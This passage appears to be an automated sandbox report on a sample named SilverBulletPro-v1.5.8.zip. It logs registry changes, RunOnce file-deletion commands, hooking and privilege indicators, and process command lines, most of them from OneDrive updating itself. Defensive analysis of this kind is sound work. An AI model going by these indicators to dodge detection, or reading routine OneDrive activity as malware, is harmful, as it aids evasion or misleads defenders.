| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileCoAuthLib64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}\LOCALSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\SyncEngineCOMServer.SyncEngineCOMServer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ = "ISyncItemPathCallback" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ = "IFileUploader" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\ProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{2E7C0A19-0438-41E9-81E3-3AD3D64F55BA}\PROGID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\INTERFACE\{E9DE26A1-51B2-47B4-B1BF-C87059CC02A7}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ = "IOneDriveInfoProvider" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\AppID\{EEABD3A3-784D-4334-AAFC-BB13234F17CF} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{4B1C80DA-FA45-468F-B42B-46496BDBE0C5}\1.0\0\win32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\INTERFACE\{2387C6BD-9A36-41A2-88ED-FF731E529384}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\odopen | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\odopen\shell\open | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\ = "SharedOverlayHandler Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\odopen\shell\open\command | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\INTERFACE\{D8C80EBB-099C-4208-AFA3-FBC4D11F8A3C}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\VersionIndependentProgID\ = "FileSyncClient.AutoPlayHandler" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\ = "FileSyncEx" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TypeLib\ = "{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\ = "FileSyncEx" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\mssharepointclient\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\Microsoft.SharePoint.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ProgID\ = "FileSyncOutOfProcServices.FileSyncOutOfProcServices.1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\ = "UpToDateCloudOverlayHandler Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\0 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe /update /restart /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode
